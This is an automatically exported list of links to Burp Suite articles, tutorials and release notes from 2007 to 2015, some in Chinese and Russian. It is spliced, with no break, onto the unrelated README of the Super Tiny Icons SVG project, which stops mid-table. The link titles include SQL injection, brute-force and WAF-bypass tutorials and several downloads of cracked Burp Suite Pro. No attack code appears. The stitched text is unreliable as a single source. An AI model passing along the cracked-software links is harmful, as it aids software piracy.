[Burp Suite vs CSRF Tokens: Round Two](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens-round-two/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens Part 2: CSRFTEI for Remote Tokens](https://www.gracefulsecurity.com/burp-vs-csrf-tokens-part-2-code/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens: CSRFTEI](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens-csrftei/) - 2015.11 [gracefulsecurity] [Burp Suite Extensions: Installing Jython and adding an Extension](https://www.gracefulsecurity.com/burp-suite-extensions-installing-jython-and-adding-an-extension/) - 2015.11 [gracefulsecurity] [Burp Macros: Automatic Re-authentication](https://www.gracefulsecurity.com/burp-macros-re-authentication/) - 2015.10 [g0tmi1k] [DVWA Brute Force (Low Level) - HTTP GET Form [Hydra, Patator, Burp]](http://blog.g0tmi1k.com/dvwa/bruteforce-low/) - 2015.10 [parsiya] [Proxying Hipchat Part 2: So You Think You Can Use Burp?](https://parsiya.net/blog/2015-10-09-proxying-hipchat-part-2-so-you-think-you-can-use-burp/) - 2015.10 [freebuf] [J2EEScan:J2EE安全扫描(Burp插件)](http://www.freebuf.com/sectool/80535.html) - 2015.09 [freebuf] [渗透测试神器Burpsuite Pro v1.6.24(含下载)](http://www.freebuf.com/sectool/77272.html) - 2015.09 [freebuf] [BurpSuite下一代渗透检测工具:BurpKit](http://www.freebuf.com/sectool/77436.html) - 2015.08 [portswigger] [Burp Suite training courses | Blog](https://portswigger.net/blog/burp-suite-training-courses) - 2015.08 [portswigger] [New release cycle for Burp Suite Free Edition | Blog](https://portswigger.net/blog/new-release-cycle-for-burp-suite-free-edition) - 2015.08 [portcullis] [Burp Extension](https://labs.portcullis.co.uk/blog/burp-extension/) - 2015.08 [freebuf] [本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks](http://www.freebuf.com/sectool/75118.html) - 2015.07 [websecurify] [The Rebirth Of REBurp](https://blog.websecurify.com/2015/07/the-rebirth-of-reburp.html) - 2015.07 [secist] [使用burp进行java反序列化攻击](http://www.secist.com/archives/309.html) - 2015.07 [compass] [SAML Burp Extension](https://blog.compass-security.com/2015/07/saml-burp-extension/) - 2015.07 [nvisium] [Intro to BurpSuite, Part VI: Burpsuite Sequencer](https://nvisium.com/blog/2015/07/09/intro-to-burpsuite-part-vi-burpsuite/) - 2015.07 [] [小技巧:Burp Suite 插件库 BApp Store](http://www.91ri.org/13377.html) - 2015.06 [gracefulsecurity] [Burp Suite Keyboard Shortcuts!](https://www.gracefulsecurity.com/burp-suite-keyboard-shortcuts/) - 2015.06 [acunetix] [Pre-seeding a crawl using output from Fiddler, Burp, Selenium and HAR files](https://www.acunetix.com/blog/articles/pre-seeding-a-crawl-using-output-from-fiddler-burp-selenium-and-har-files/) - 2015.06 [freebuf] [可绕过WAF的Burp Suite插件 – BypassWAF](http://www.freebuf.com/sectool/69988.html) - 2015.05 [netspi] [Debugging Burp Extensions](https://blog.netspi.com/debugging-burp-extensions/) - 2015.05 [idontplaydarts] [Detecting low entropy tokens with massive bloom filters in Burp](https://www.idontplaydarts.com/2015/05/low-entropy-tokens-massive-bloom-filters-burp-http/) - 2015.05 [portswigger] [New Burp Suite testing methodologies | Blog](https://portswigger.net/blog/new-burp-suite-testing-methodologies) - 2015.05 [freebuf] [渗透测试神器Burp Suite v1.6.17(含破解版下载)](http://www.freebuf.com/sectool/66521.html) - 2015.05 [portswigger] [Burp Suite now reports blind XXE injection | Blog](https://portswigger.net/blog/burp-suite-now-reports-blind-xxe-injection) - 2015.04 [toolswatch] [Burp Suite Professional v1.6.13 Released](http://www.toolswatch.org/2015/04/burp-suite-professional-v1-6-13-released/) - 2015.04 [mediaservice] [Pentesting with Serialized Java Objects and Burp Suite](https://techblog.mediaservice.net/2015/04/pentesting-with-serialized-java-objects-and-burp-suite/) - 2015.04 [portswigger] [Introducing Burp Collaborator | Blog](https://portswigger.net/blog/introducing-burp-collaborator) - 2015.04 [freebuf] [渗透测试神器Burp Suite v1.6.12破解版下载](http://www.freebuf.com/sectool/63469.html) - 2015.02 [sans] [BURP 1.6.10 Released](https://isc.sans.edu/forums/diary/BURP+1610+Released/19305/) - 2015.01 [portswigger] [Burp Suite Support Center | Blog](https://portswigger.net/blog/burp-suite-support-center) - 2015.01 [portswigger] [Burp Suite Pro price held for 2015 | Blog](https://portswigger.net/blog/burp-suite-pro-price-held-for-2015) - 2014.12 [insinuator] [Getting 20k Inline-QR-Codes out of Burp](https://insinuator.net/2014/12/getting-20k-inline-qr-codes-out-of-burp/) - 2014.11 [liftsecurity] [Static Analysis and Burp Suite](https://blog.liftsecurity.io/2014/11/18/static-analysis-and-burp-suite/) - 2014.10 [buer] [Detecting Burp Suite – Part 2 of 3: Callback Exposure](https://buer.haus/2014/10/13/detecting-burp-suite-part-2-of-3-callback-exposure/) - 2014.10 [portswigger] [Burp integrates with WebInspect | Blog](https://portswigger.net/blog/burp-integrates-with-webinspect) - 2014.09 [freebuf] [渗透神器合体:在BurpSuite中集成Sqlmap](http://www.freebuf.com/sectool/45239.html) - 2014.09 [compass] [BurpSentinel on Darknet](https://blog.compass-security.com/2014/09/burpsentinel-on-darknet/) - 2014.08 [insinuator] [ERNW’s Top 9 Burp Plugins](https://insinuator.net/2014/08/ernws-top-9-burp-plugins/) - 2014.08 [liftsecurity] [Burp Extender With Scala](https://blog.liftsecurity.io/2014/08/23/burp-extender-with-scala/) - 2014.08 [nvisium] [Intro to BurpSuite V: Extracting Intrusions](https://nvisium.com/blog/2014/08/13/intro-to-burpsuite-v-extracting/) - 2014.08 [appsecconsulting] [Running Stubborn Devices Through Burp Suite via OSX Mountain Lion and Above](https://appsecconsulting.com/blog/running-stubborn-devices-through-burp-suite-via-osx-mountain-lion-and-above) - 2014.08 [nvisium] [iOS Assessments with Burp + iFunBox + SQLite](https://nvisium.com/blog/2014/08/06/ios-assessments-with-burp-ifunbox-sqlite/) - 2014.08 [milo2012] [Extended functionality for Burp Plugin – Carbonator](https://milo2012.wordpress.com/2014/08/04/extended-functionality-for-burp-plugin-carbonator/) - 2014.07 [portswigger] [Burp gets new JavaScript analysis capabilities | Blog](https://portswigger.net/blog/burp-gets-new-javascript-analysis-capabilities) - 2014.07 [nvisium] [Intro to BurpSuite Part IV: Being Intrusive](https://nvisium.com/blog/2014/07/23/intro-to-burpsuite-part-iv-being/) - 2014.07 [liftsecurity] [Introducing Burpbuddy](https://blog.liftsecurity.io/2014/07/15/introducing-burpbuddy/) - 2014.07 [buer] [Detecting Burp Suite – Part 1 of 3: Info Leak](https://buer.haus/2014/07/13/detecting-burp-suite-part-1-of-3-info-leak/) - 2014.07 [notsosecure] [Pentesting Web Service with anti CSRF token using BurpPro](https://www.notsosecure.com/pentesting-web-service-with-csrf-token-with-burp-pro/) - 2014.06 [robert] [Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04](https://robert.penz.name/856/howto-install-and-use-the-burp-suite-as-https-proxy-on-ubuntu-14-04/) - 2014.06 [parsiya] [Piping SSL/TLS Traffic from SoapUI to Burp](https://parsiya.net/blog/2014-06-25-piping-ssl/tls-traffic-from-soapui-to-burp/) - 2014.06 [sensepost] [Associating an identity with HTTP requests – a Burp extension](https://sensepost.com/blog/2014/associating-an-identity-with-http-requests-a-burp-extension/) - 2014.05 [sans] [Assessing SOAP APIs with Burp](https://isc.sans.edu/forums/diary/Assessing+SOAP+APIs+with+Burp/18175/) - 2014.05 [nvisium] [Intro to BurpSuite: Part III - It's all about Repetition!](https://nvisium.com/blog/2014/05/09/intro-to-burpsuite-part-iii-its-all/) - 2014.04 [freebuf] [国产BurpSuite插件 Assassin V1.1发布](http://www.freebuf.com/sectool/32746.html) - 2014.04 [freebuf] [国产BurpSuite 插件 Assassin V1.0发布](http://www.freebuf.com/sectool/32153.html) - 2014.04 [toolswatch] [Burp Suite Professional v1.6 Released](http://www.toolswatch.org/2014/04/burp-suite-professional-v1-6-released/) - 2014.04 [portswigger] [Burp Suite Free Edition v1.6 released | Blog](https://portswigger.net/blog/burp-suite-free-edition-v1-6-released) - 2014.03 [freebuf] [知名渗透测试套件BurpSuite Pro v1.6 beta破解版公布](http://www.freebuf.com/sectool/29161.html) - 2014.03 [nvisium] [Burp App Store](https://nvisium.com/blog/2014/03/14/burp-app-store/) - 2014.02 [nvisium] [Intro to Burp Part II: Sighting in your Burp Scope](https://nvisium.com/blog/2014/02/21/intro-to-burp-part-ii-sighting-in-your/) - 2014.02 [silentsignal] [Testing websites using ASP.NET Forms Authentication with Burp Suite](https://blog.silentsignal.eu/2014/02/20/testing-websites-using-asp-net-forms-auth-with-burp-suite/) - 2014.02 [nvisium] [Using Burp Intruder to Test CSRF Protected Applications](https://nvisium.com/blog/2014/02/14/using-burp-intruder-to-test-csrf/) - 2014.02 [trustwave] [“Reversing” Non-Proxy Aware HTTPS Thick Clients w/ Burp](https://www.trustwave.com/Resources/SpiderLabs-Blog/%E2%80%9CReversing%E2%80%9D-Non-Proxy-Aware-HTTPS-Thick-Clients-w/-Burp/) - 2014.02 [nvisium] [Challenges of Mobile API Signature Forgery with Burp Intruder](https://nvisium.com/blog/2014/02/07/challenges-of-mobile-api-signature/) - 2014.02 [portswigger] [Burp Suite Pro shines in new survey | Blog](https://portswigger.net/blog/burp-suite-pro-shines-in-new-survey) - 2014.01 [nvisium] [Accurate XSS Detection with BurpSuite and PhantomJS](https://nvisium.com/blog/2014/01/31/accurate-xss-detection-with-burpsuite/) - 2014.01 [nvisium] [Android Assessments with GenyMotion + Burp](https://nvisium.com/blog/2014/01/24/android-assessments-with-genymotion-burp/) - 2014.01 [sethsec] [Writing and Debugging BurpSuite Extensions in Python](https://sethsec.blogspot.com/2014/01/writing-and-debugging-burpsuite.html) - 2014.01 [sethsec] [Re-launch - A focus on Web Application Pen Testing, Burp Extensions, etc](https://sethsec.blogspot.com/2014/01/re-launch-focus-on-web-application-pen.html) - 2014.01 [nvisium] [Intro To Burp Suite Part I: Setting Up BurpSuite with Firefox and FoxyProxy](https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/) - 2014.01 [portswigger] [Burp Suite Pro price held for 2014 | Blog](https://portswigger.net/blog/burp-suite-pro-price-held-for-2014) - 2013.12 [freebuf] [Java编写代理服务器(Burp拦截Demo)一](http://www.freebuf.com/articles/web/21832.html) - 2013.12 [freebuf] [burpsuite_pro_v1.5.20破解版下载](http://www.freebuf.com/sectool/21446.html) - 2013.12 [appsecconsulting] [So You Want to Build a Burp Plugin?](https://appsecconsulting.com/blog/so-you-want-to-build-a-burp-plugin) - 2013.12 [directdefense] [Multiple NONCE (one-time token) Value Tracking with Burp Extender](https://www.directdefense.com/multiple-nonce-one-time-token-value-tracking-burp-extender/) - 2013.11 [freebuf] [burpsuite_pro_v1.5.18 破解版](http://www.freebuf.com/sectool/18483.html) - 2013.11 [freebuf] [burpsuite_pro_v1.5.11 破解版](http://www.freebuf.com/sectool/16340.html) - 2013.10 [debasish] [Fuzzing Facebook for $$$ using Burpy](http://www.debasish.in/2013/10/fuzzing-facebook-for-using-burpy.html) - 2013.10 [agarri] [Exploiting WPAD with Burp Suite and the "HTTP Injector" extension](http://www.agarri.fr/blog/../kom/archives/2013/10/22/exploiting_wpad_with_burp_suite_and_the_http_injector_extension/index.html) - 2013.10 [agarri] [Exploiting WPAD with Burp Suite and the "HTTP Injector" extension](https://www.agarri.fr/blog/archives/2013/10/22/exploiting_wpad_with_burp_suite_and_the_http_injector_extension/index.html) - 2013.10 [portswigger] [Burp through the ages | Blog](https://portswigger.net/blog/burp-through-the-ages) - 2013.09 [portswigger] [SSL pass through in Burp | Blog](https://portswigger.net/blog/ssl-pass-through-in-burp) - 2013.08 [freebuf] [BurpSuite权限提升漏洞检测插件——The Burp SessionAuth](http://www.freebuf.com/sectool/11905.html) - 2013.08 [toolswatch] [The Burp SessionAuth – Extension for Detection of Possible Privilege escalation vulnerabilities](http://www.toolswatch.org/2013/08/the-burp-sessionauth-extension-for-detection-of-possible-privilege-escalation-vulnerabilities/) - 2013.07 [cyberis] [Testing .NET MVC for JSON Request XSS - POST2JSON Burp Extension](https://www.cyberis.co.uk/2013/07/testing-net-mvc-for-json-request-xss.html) - 2013.06 [portswigger] [Burp Suite confirmed as best value web security scanner | Blog](https://portswigger.net/blog/burp-suite-confirmed-as-best-value-web-security-scanner) - 2013.06 [raz0r] [Radamsa Fuzzer Extension for Burp Suite](https://raz0r.name/releases/burp-radamsa/) - 2013.06 [sec] [How to rapidly build a Burp session handling extension using JavaScript](https://sec-consult.com/en/blog/2013/06/how-to-rapidly-build-a-burp-session-handling-extension-using-javascript/) - 2013.06 [freebuf] [angelc0de原创burpsuite系列培训教程(下载)](http://www.freebuf.com/video/10591.html) - 2013.06 [freebuf] [BurpSuite系列使用视频教程(下载)](http://www.freebuf.com/video/10468.html) - 2013.05 [] [Burp Suite处理“不支持代理”的客户端](http://www.91ri.org/5976.html) - 2013.05 [] [Burp通过注射点dump数据库](http://www.91ri.org/5872.html) - 2013.05 [trustwave] [Introducing the Burp Notes Extension](https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-the-Burp-Notes-Extension/) - 2013.04 [pediy] [[原创]利用sqlmap和burpsuite绕过csrf token进行SQL注入](https://bbs.pediy.com/thread-168302.htm) - 2013.03 [portswigger] [Burp Suite is on a feature roll! | Blog](https://portswigger.net/blog/burp-suite-is-on-a-feature-roll) - 2013.03 [security] [Penetration Test pWnOS v2.0 with BurpSuite](http://security-is-just-an-illusion.blogspot.com/2013/03/penetration-test-pwnos-v20-with.html) - 2013.03 [freebuf] [使用Burp攻击Web Services](http://www.freebuf.com/articles/web/7592.html) - 2013.03 [netspi] [Hacking Web Services with Burp](https://blog.netspi.com/hacking-web-services-with-burp/) - 2013.03 [] [Burpsuite_pro_v1.5.01多平台破解版](http://www.91ri.org/5378.html) - 2013.02 [freebuf] [Burpsuite教程与技巧之HTTP brute暴力破解](http://www.freebuf.com/articles/web/7457.html) - 2013.02 [freebuf] [Burpsuite_pro_v1.5.01多平台破解版](http://www.freebuf.com/sectool/7464.html) - 2013.02 [freebuf] [AuthTrans(原创工具)+BurpSuite的暴力美学-破解Http Basic认证](http://www.freebuf.com/articles/web/7450.html) - 2013.02 [pentestlab] [SQL Injection Authentication Bypass With Burp](https://pentestlab.blog/2013/02/25/sql-injection-authentication-bypass-with-burp/) - 2013.01 [freebuf] [[下载]burpsuite_pro_v1.5_crack更新](http://www.freebuf.com/sectool/6917.html) - 2013.01 [rapid7] [Video Tutorial: Introduction to Burp-Suite 1.5 Web Pen Testing Proxy](https://blog.rapid7.com/2013/01/15/video-tutorial-introduction-to-burp-suite-15-web-pen-testing-proxy/) - 2013.01 [websecurify] [Loading Burp Files Inside Websecurify Suite Video](https://blog.websecurify.com/2013/01/loading-burp-files-inside-websecurify-suite-video.html) - 2013.01 [websecurify] [Reading Burp Files From Websecurify Suite](https://blog.websecurify.com/2013/01/reading-burp-files-from-websecurify-suite.html) - 2013.01 [netspi] [Tool release: AMF Deserialize Burp plugin](https://blog.netspi.com/tool-release-amf-deserialize-burp-plugin/) - 2012.12 [pentestlab] [Local File Inclusion Exploitation With Burp](https://pentestlab.blog/2012/12/26/local-file-inclusion-exploitation-with-burp/) - 2012.12 [freebuf] [iPhone上使用Burp Suite捕捉HTTPS通信包方法](http://www.freebuf.com/articles/web/6577.html) - 2012.12 [portswigger] [Sample Burp Suite extension: Intruder payloads | Blog](https://portswigger.net/blog/sample-burp-suite-extension-intruder-payloads) - 2012.12 [pentestlab] [Brute Force Attack With Burp](https://pentestlab.blog/2012/12/21/brute-force-attack-with-burp/) - 2012.12 [portswigger] [Sample Burp Suite extension: custom scanner checks | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-scanner-checks) - 2012.12 [portswigger] [Sample Burp Suite extension: custom scan insertion points | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-scan-insertion-points) - 2012.12 [portswigger] [Sample Burp Suite extension: custom editor tab | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-editor-tab) - 2012.12 [portswigger] [Sample Burp Suite extension: custom logger | Blog](https://portswigger.net/blog/sample-burp-suite-extension-custom-logger) - 2012.12 [portswigger] [Sample Burp Suite extension: traffic redirector | Blog](https://portswigger.net/blog/sample-burp-suite-extension-traffic-redirector) - 2012.12 [portswigger] [Sample Burp Suite extension: event listeners | Blog](https://portswigger.net/blog/sample-burp-suite-extension-event-listeners) - 2012.12 [portswigger] [Sample Burp Suite extension: Hello World | Blog](https://portswigger.net/blog/sample-burp-suite-extension-hello-world) - 2012.12 [portswigger] [Writing your first Burp Suite extension | Blog](https://portswigger.net/blog/writing-your-first-burp-suite-extension) - 2012.12 [portswigger] [New Burp Suite Extensibility | Blog](https://portswigger.net/blog/new-burp-suite-extensibility) - 2012.12 [freebuf] [Burpsuite sqlmap插件](http://www.freebuf.com/sectool/6426.html) - 2012.11 [portswigger] [New Burp Suite Extensibility - preview | Blog](https://portswigger.net/blog/new-burp-suite-extensibility-preview) - 2012.11 [freebuf] [渗透测试神器Burp弹药扩充-fuzzdb](http://www.freebuf.com/sectool/6181.html) - 2012.11 [freebuf] [Burp Suite—BLIND SQL INJECTION](http://www.freebuf.com/articles/web/6154.html) - 2012.11 [perezbox] [Spoofing an Admin’s Cookies Using Burp](https://perezbox.com/2012/11/pracapp-spoofing-an-admins-cookies-using-burp-suite/) - 2012.11 [freebuf] [Burp Suite免费版本(Free Edition)v1.5发布](http://www.freebuf.com/sectool/6090.html) - 2012.10 [portswigger] [Burp Suite Free Edition v1.5 released | Blog](https://portswigger.net/blog/burp-suite-free-edition-v1-5-released) - 2012.10 [] [利用burpsuite获得免费空间](http://www.91ri.org/4522.html) - 2012.10 [freebuf] [Burp Suite PayLoad下载](http://www.freebuf.com/sectool/6017.html) - 2012.10 [] [使用BurpSuite来进行sql注入](http://www.91ri.org/4415.html) - 2012.10 [netspi] [Pentesting Java Thick Applications with Burp JDSer](https://blog.netspi.com/pentesting-java-thick-applications-with-burp-jdser/) - 2012.10 [toolswatch] [Burp Suite v1.5rc2 released](http://www.toolswatch.org/2012/10/burp-suite-v1-5rc2-released/) - 2012.09 [trustwave] [Adding Anti-CSRF Support to Burp Suite Intruder](https://www.trustwave.com/Resources/SpiderLabs-Blog/Adding-Anti-CSRF-Support-to-Burp-Suite-Intruder/) - 2012.09 [] [用Burp_suite快速处理上传截断](http://www.91ri.org/4091.html) - 2012.09 [portswigger] [All new Burp help | Blog](https://portswigger.net/blog/all-new-burp-help) - 2012.09 [] [使用burp suite探测Web目录](http://www.91ri.org/4064.html) - 2012.09 [freebuf] [BurpSuite教程与技巧之SQL Injection](http://www.freebuf.com/articles/5560.html) - 2012.08 [freebuf] [Burp Suite V1.4.12发布: 新增破解Android SSL功能](http://www.freebuf.com/sectool/5347.html) - 2012.08 [toolswatch] [Burp Suite v1.4.12 in the wild with the support of Android SSL Analysis](http://www.toolswatch.org/2012/08/burp-suite-v1-4-12-in-the-wild-with-the-support-of-android-ssl-analysis/) - 2012.07 [raz0r] [Прокачиваем Burp Suite](https://raz0r.name/articles/extending-burp-suite/) - 2012.07 [console] [Setting up a Burp development environment](http://console-cowboys.blogspot.com/2012/07/setting-up-burp-development-environment.html) - 2012.06 [freebuf] [burpsuite_pro_v1.4.07破解版](http://www.freebuf.com/sectool/4771.html) - 2012.06 [freebuf] [burpsuite v1.4.10发布](http://www.freebuf.com/sectool/4768.html) - 2012.06 [toolswatch] [Burp Suite Professional v1.4.08 Released](http://www.toolswatch.org/2012/06/burp-suite-professional-v1-4-08-released/) - 2012.06 [toolswatch] [Burp Suite Professional v1.4.09 Released](http://www.toolswatch.org/2012/06/burp-suite-professional-v1-4-09-released/) - 2012.06 [toolswatch] [Burp Suite Professional v1.4.10 Released](http://www.toolswatch.org/2012/06/burp-suite-professional-v1-4-10-released/) - 2012.06 [milo2012] [Automating SQL Injection with Burp, Sqlmap and GDS Burp API](https://milo2012.wordpress.com/2012/06/26/automating-sql-injection-with-burp-sqlmap-and-gds-burp-api/) - 2012.06 [freebuf] [[连载]Burp Suite详细使用教程-Intruder模块详解(3)](http://www.freebuf.com/articles/4184.html) - 2012.06 [portswigger] [Burp gets a makeover | Blog](https://portswigger.net/blog/burp-gets-a-makeover) - 2012.06 [freebuf] [[连载]Burp Suite详细使用教程-Intruder模块详解(2)](http://www.freebuf.com/sectool/3693.html) - 2012.06 [websec] [Using Burp to exploit a Blind SQL Injection](https://websec.ca/blog/view/using-burp-to-exploit-blind-sql-injection) - 2012.06 [freebuf] [[技巧]Burp Intruder中的Timing选项的使用](http://www.freebuf.com/sectool/3369.html) - 2012.06 [secproject] [Burp Suite Beautifier Extension](https://soroush.secproject.com/blog/2012/06/burp-suite-beautifier-extension/) - 2012.05 [freebuf] [[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试](http://www.freebuf.com/sectool/2311.html) - 2012.05 [freebuf] [Burp Suite详细使用教程-Intruder模块详解](http://www.freebuf.com/sectool/2079.html) - 2012.05 [freebuf] [Burp Suite python扩展 – Burpy](http://www.freebuf.com/sectool/2170.html) - 2012.05 [portswigger] [Burp Suite user forum | Blog](https://portswigger.net/blog/burp-suite-user-forum) - 2012.05 [freebuf] [Burpsuite系列视频教程不加密版第一部分公布下载](http://www.freebuf.com/articles/1467.html) - 2012.05 [freebuf] [burpsuite_pro_v1.4.01破解版](http://www.freebuf.com/sectool/1266.html) - 2012.04 [firebitsbr] [Pentest tool: Gason: A plugin to run sqlmap into burpsuite.](https://firebitsbr.wordpress.com/2012/04/22/pentest-tool-gason-a-plugin-to-run-sqlmap-into-burpsuite/) - 2012.04 [toolswatch] [Burp Suite Professional v1.4.07 Released](http://www.toolswatch.org/2012/04/burp-suite-professional-v1-4-07-released/) - 2012.03 [toolswatch] [Burp Suite Professional v1.4.06 Released](http://www.toolswatch.org/2012/03/burp-suite-professional-v1-4-06-released/) - 2012.01 [idontplaydarts] [Extending Burp Suite to solve reCAPTCHA](https://www.idontplaydarts.com/2012/01/extending-burp-suite-to-solve-recaptcha/) - 2011.12 [milo2012] [OWASP Ajax Crawling Tool (Good Companion Tool to Burpsuite)](https://milo2012.wordpress.com/2011/12/26/owasp-ajax-crawling-tool-good-companion-tool-to-burpsuite/) - 2011.12 [insinuator] [Use Python for Burp plugins with pyBurp](https://insinuator.net/2011/12/use-python-for-burp-plugins-with-pyburp/) - 2011.12 [toolswatch] [Burp Suite Professional v1.4.05 released](http://www.toolswatch.org/2011/12/burp-suite-professional-v1-4-05-released/) - 2011.11 [portswigger] [Burp is voted #1 web scanner | Blog](https://portswigger.net/blog/burp-is-voted-1-web-scanner) - 2011.11 [digi] [Burp Intruder Attack Types](https://digi.ninja/blog/burp_intruder_types.php) - 2011.10 [toolswatch] [Burp Suite Professional v1.4.02 released](http://www.toolswatch.org/2011/10/burp-suite-professional-v1-4-02-released/) - 2011.10 [portswigger] [Breaking encrypted data using Burp | Blog](https://portswigger.net/blog/breaking-encrypted-data-using-burp) - 2011.06 [cyberis] ['Invisible Intercept' Function of Burp](https://www.cyberis.co.uk/2011/06/intercept-function-of-burp.html) - 2011.06 [console] [Burp Intruder Time fields](http://console-cowboys.blogspot.com/2011/06/burp-intruder-time-fields.html) - 2011.06 [toolswatch] [Burp Suite Free Edition v1.4 released (Support of IPv6)](http://www.toolswatch.org/2011/06/burp-suite-free-edition-v1-4-released-support-of-ipv6/) - 2011.06 [portswigger] [Burp Suite Free Edition v1.4 released | Blog](https://portswigger.net/blog/burp-suite-free-edition-v1-4-released) - 2011.05 [console] [Web Hacking Video Series #1 Automating SQLi with Burp Extractor](http://console-cowboys.blogspot.com/2011/05/web-hacking-video-series-1-automating.html) - 2011.04 [depthsecurity] [Blind SQL Injection & BurpSuite - Like a Boss](https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss) - 2011.03 [portswigger] [Burp v1.4 beta now available | Blog](https://portswigger.net/blog/burp-v1-4-beta-now-available) - 2011.03 [portswigger] [Burp v1.4 preview - Session handling: putting it all together | Blog](https://portswigger.net/blog/burp-v1-4-preview-session-handling-putting-it-all-together) - 2011.03 [portswigger] [Burp v1.4 preview - Macros | Blog](https://portswigger.net/blog/burp-v1-4-preview-macros) - 2011.03 [portswigger] [Burp v1.4 preview - Session handling | Blog](https://portswigger.net/blog/burp-v1-4-preview-session-handling) - 2011.03 [toolswatch] [Burp v1.4 preview – Comparing site maps](http://www.toolswatch.org/2011/03/burp-v1-4-preview-comparing-site-maps/) - 2011.03 [portswigger] [Burp v1.4 preview - Testing access controls using your browser | Blog](https://portswigger.net/blog/burp-v1-4-preview-testing-access-controls-using-your-browser) - 2011.03 [portswigger] [Burp v1.4 preview - Comparing site maps | Blog](https://portswigger.net/blog/burp-v1-4-preview-comparing-site-maps) - 2010.09 [netspi] [Fuzzing Parameters in CSRF Resistant Applications with Burp Proxy](https://blog.netspi.com/fuzzing-parameters-in-csrf-resistant-applications-with-burp-proxy/) - 2010.08 [gdssecurity] [Constricting the Web: The GDS Burp API](https://blog.gdssecurity.com/labs/2010/8/10/constricting-the-web-the-gds-burp-api.html) - 2010.01 [portswigger] [Burp Suite v1.3 released | Blog](https://portswigger.net/blog/burp-suite-v1-3-released) - 2009.11 [portswigger] [Burp Suite v1.3 preview | Blog](https://portswigger.net/blog/burp-suite-v1-3-preview) - 2009.11 [gdssecurity] [WCF Binary Soap Plug-In for Burp](https://blog.gdssecurity.com/labs/2009/11/19/wcf-binary-soap-plug-in-for-burp.html) - 2009.11 [portswigger] [GIAC paper on Burp Intruder | Blog](https://portswigger.net/blog/giac-paper-on-burp-intruder) - 2009.04 [portswigger] [Burp problems after Windows update | Blog](https://portswigger.net/blog/burp-problems-after-windows-update) - 2009.04 [portswigger] [Using Burp Extender | Blog](https://portswigger.net/blog/using-burp-extender) - 2008.12 [portswigger] [Burp Suite v1.2 released | Blog](https://portswigger.net/blog/burp-suite-v1-2-released) - 2008.11 [portswigger] [[MoBP] Burp Extender extended | Blog](https://portswigger.net/blog/mobp-burp-extender-extended) - 2008.11 [raz0r] [Эффективный и быстрый пентестинг веб-приложений с Burp Suite](https://raz0r.name/obzory/effektivnyj-i-bystryj-pentesting-veb-prilozhenij-s-burp-suite/) - 2008.11 [portswigger] [[MoBP] The all new Burp Spider | Blog](https://portswigger.net/blog/mobp-the-all-new-burp-spider) - 2008.11 [portswigger] [The Month of Burp Pr0n | Blog](https://portswigger.net/blog/the-month-of-burp-pr0n) - 2008.05 [portswigger] [Burp Sequencer 101 | Blog](https://portswigger.net/blog/burp-sequencer-101) - 2008.02 [gdssecurity] [A "Deflate" Burp Plug-In](https://blog.gdssecurity.com/labs/2008/2/19/a-deflate-burp-plug-in.html) - 2007.12 [portswigger] [Burp Suite v1.1 released | Blog](https://portswigger.net/blog/burp-suite-v1-1-released) - 2007.11 [gdssecurity] [Beta version of the new Burp Suite released](https://blog.gdssecurity.com/labs/2007/11/27/beta-version-of-the-new-burp-suite-released.html) - 2007.10 [portswigger] [Introducing Burp Sequencer | Blog](https://portswigger.net/blog/introducing-burp-sequencer) - 2007.09 [portswigger] [Burp Suite feature requests - thank you | Blog](https://portswigger.net/blog/burp-suite-feature-requests-thank-you) # 贡献 内容为系统自动导出, 有任何问题请提issue
# Super Tiny Icons Under 1KB each! Super Tiny Web Icons are minuscule SVG versions of your favourite logos. The average size is _under_ 582 bytes! The logos have a 512x512 viewbox, they will fit in a circle with radius 256. They will scale up and down to suit your needs. Say thanks! [![Buy me a coffee](https://www.ko-fi.com/img/donate_sm.png)](https://ko-fi.com/edent) ## How Small? | 533 Bytes SVG | 3,328 Bytes PNG | 358 Bytes SVG | 2,987 Bytes PNG | 241 Bytes SVG | 1,615 Bytes PNG | | -------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------- | | <img src="https://edent.github.io/SuperTinyIcons/images/svg/github.svg" width="100" /> | <img src="https://edent.github.io/SuperTinyIcons/images/png/github.png" width="100" /> | <img src="https://edent.github.io/SuperTinyIcons/images/svg/twitter.svg" width="100" /> | <img src="https://edent.github.io/SuperTinyIcons/images/png/twitter.png" width="100" /> | <img src="https://edent.github.io/SuperTinyIcons/images/svg/flickr.svg" width="100" /> | <img src="https://edent.github.io/SuperTinyIcons/images/png/flickr.png" width="100" /> | ## What's Available so far? <table> <tr> <td>1Password<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/1password.svg" width="100" title="1Password"><br>366 bytes</td> <td>Acast<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/acast.svg" width="100" title="Acast"><br>412 bytes</td> <td>Access<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/access.svg" width="100" title="Access"><br>355 bytes</td> <td>ActivityPub<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/activitypub.svg" width="100" title="ActivityPub"><br>343 bytes</td> <td>Adobe<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/adobe.svg" width="100" title="Adobe"><br>226 bytes</td> <td>Airbnb<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/airbnb.svg" width="100" title="Airbnb"><br>362 bytes</td> </tr> <tr> <td>Amazon<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/amazon.svg" width="100" title="Amazon"><br>648 bytes</td> <td>Amazon Alexa<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/amazon_alexa.svg" width="100" title="Amazon Alexa"><br>258 